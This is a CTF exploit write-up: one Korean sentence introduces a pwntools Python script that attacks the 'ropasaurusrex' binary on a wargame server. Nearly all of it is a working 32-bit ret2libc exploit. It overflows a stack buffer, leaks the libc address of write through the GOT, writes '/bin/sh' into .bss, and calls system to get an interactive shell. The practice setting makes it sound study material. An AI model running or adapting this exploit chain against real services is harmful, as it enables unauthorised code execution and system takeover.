rop32와 달라진 점은, 함수의 주소값을 직접 넣어줘야 한다는 것과 libc leak에 write 함수를 사용해야 한다는 것입니다.
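from pwn import *

# 32-bit ret2libc against ropasaurusrex:
#   1. write(1, got['write'], 4)  -> leak the libc address of write()
#   2. read(0, bss+0x10, 0x20)    -> stage "/bin/sh\0" in writable memory
#   3. system(bss+0x10)
# Every gadget/offset below is specific to the sunrin.site binary and its
# shipped libc.so.6; re-derive them before reusing this against anything else.
context.log_level = 'debug'
e = ELF('./ropasaurusrex')
r = remote('sunrin.site', 9005)
libc = ELF('./libc.so.6')

# pop ebx ; pop esi ; pop edi ; ret -- pops the three call arguments so the
# chain can continue after each 3-argument call.
pppret = 0x080484b6
# 0x88 bytes of stack buffer plus the 4-byte saved ebp before the return address.
pad = b'A' * (0x88 + 4)
# Address the chain returns into after each call.  Presumably the vulnerable
# function, so the same overflow can be hit again -- TODO confirm in the binary.
vuln = 0x804841d

# --- stage 1: leak write@libc through write@plt --------------------------------
payload = pad
payload += p32(e.plt['write'])
payload += p32(pppret)
payload += p32(1)                 # fd = stdout
payload += p32(e.got['write'])    # buf = GOT slot holding the resolved address
payload += p32(0x4)               # len = one 32-bit pointer
payload += p32(vuln)
r.sendline(payload)

# Read exactly the 4 leaked bytes.  The old recvuntil('\xf7') stopped at the first
# 0xf7 byte, which can be a *low* byte of the address itself (e.g. 0x....f7..),
# leaving u32() with fewer than 4 bytes.
_write = u32(r.recvn(4))
# ASLR moves libc by whole pages, so the low 12 bits must match the symbol in
# the local libc.  A mismatch means the wrong libc.so.6 or unexpected output
# arriving before the leak; abort instead of returning into garbage.
if (_write & 0xfff) != (libc.sym['write'] & 0xfff):
    log.error('bad leak 0x%08x: libc mismatch or unexpected output before the leak' % _write)
_base = _write - libc.sym['write']
_system = _base + libc.sym['system']
_binsh = e.bss() + 0x10           # writable, fixed address (no PIE) for "/bin/sh"
log.info('libc base   = 0x%08x' % _base)
log.info('system      = 0x%08x' % _system)

# --- stage 2: read "/bin/sh\0" into .bss ---------------------------------------
payload = pad
payload += p32(e.plt['read'])
payload += p32(pppret)
payload += p32(0)                 # fd = stdin
payload += p32(_binsh)
payload += p32(0x20)
payload += p32(vuln)
r.sendline(payload)
# NOTE: this and the previous sendline are separate writes; if the target's
# first read() is large enough to swallow both when they coalesce, the string
# never reaches the ROP read().  Add a short delay between them if the exploit
# is flaky.
r.sendline(b'/bin/sh\x00')

# --- stage 3: system("/bin/sh") ------------------------------------------------
payload = pad
payload += p32(_system)
payload += b'A' * 4               # fake return address for system()
payload += p32(_binsh)
r.sendline(payload)
r.interactive()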